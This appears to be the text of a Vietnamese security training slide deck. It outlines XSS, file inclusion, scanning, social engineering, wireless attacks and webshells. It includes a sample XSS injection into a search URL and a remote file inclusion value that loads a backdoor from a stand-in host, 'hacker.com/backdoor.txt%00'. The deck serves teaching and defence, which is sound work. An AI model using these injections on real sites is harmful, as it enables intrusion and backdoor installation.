security task force trainning

Security Task Force Trainning

Nguyễn Ngọc MinhBkis Security

Nội dung bài giới thiệu

Các lỗ hổng XSS & File Inclusion

Tấn công dựa trên thăm dò và tìm kiếm (Footprinting, Scanning)

Tấn công dựa trên điểm yếu con người (Social Engineering)

Tấn công qua mạng không dây (Wireless Hacking)

Case Study: Làm việc với các webshell cơ bản.

Lỗ hổng XSS

Xét một ví dụ thực tế

Login Login

???

Cookie1 Cookie2

Session1 Session2

Mỗi trình duyệt có thể mở nhiều website

Cơ chế Cross –Domain giúp cho “website” này không lấy được thông tin của “website” kia

http://bkav.com/timkiem.asp?tukhoa=hello

<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div>

MỌI THÔNG TIN INPUT ĐỀU ĐƯỢC OUTPUT RA TRÌNH DUYỆT!!!

http://bkav.com/timkiem.asp?tukhoa= hello<br><br></div> [Một đoạn mã html - Javascript] <div>

Một đoãn Mã JavaScript sẽ được thực thi!!!

<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div> [Một đoạn mã html- Javascript] <div> <br><br></div>

http://bkav.com/timkiem.asp?tukhoa= hello<br><br></div> [Một đoạn mã html - Javascript] <div>

Một đoãn Mã JavaScript sẽ được thực thi!!!

<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div> [Một đoạn mã html- Javascript] <div> <br><br></div>

Kịch bản tấn công XSS

DEMO: Khai thác lỗ hổng XSS

Lỗ hổng File Inclusion

Cơ chế Include

……..Include(‘a.txt’)………

a.Txt………..……..….......……..

……..…….........………….…….........………….………

Vì sao cần phải có cơ chế include

Tối giản mã

Phát triển module

……..

nokia/product_info.phpsony/product_info.php

include(“$sanpham/product.info”);http://hacker.com/backdoor.txt%00

include(“http://hacker.com/backdoor.txt%00/product.info”);

include(“http://hacker.com/backdoor.txt”);

DEMO: Khai thác lỗ hổng File Inclusion

Tấn công qua các lỗ hổng đã biết

* Bản vá

* Mã khai thác được công bố

* Target

DEMO: Tấn công khai tháchttp://www.faultlyne.com

Foot Printing & Scanning

Foot Printing & Scanning???

DEMO: Lấy thông tin của www.bkav.com.vn

NMAP

Google Hacking

Social Engineering

• Gọi điện thoại

•Email

• Nhân viên dịch vụ…

Wireless Hacking

Mã hóa

Chứng thực

WEP

WPA

WPA2

Case Study:Thực hành với các webshell

Xin cảm ơn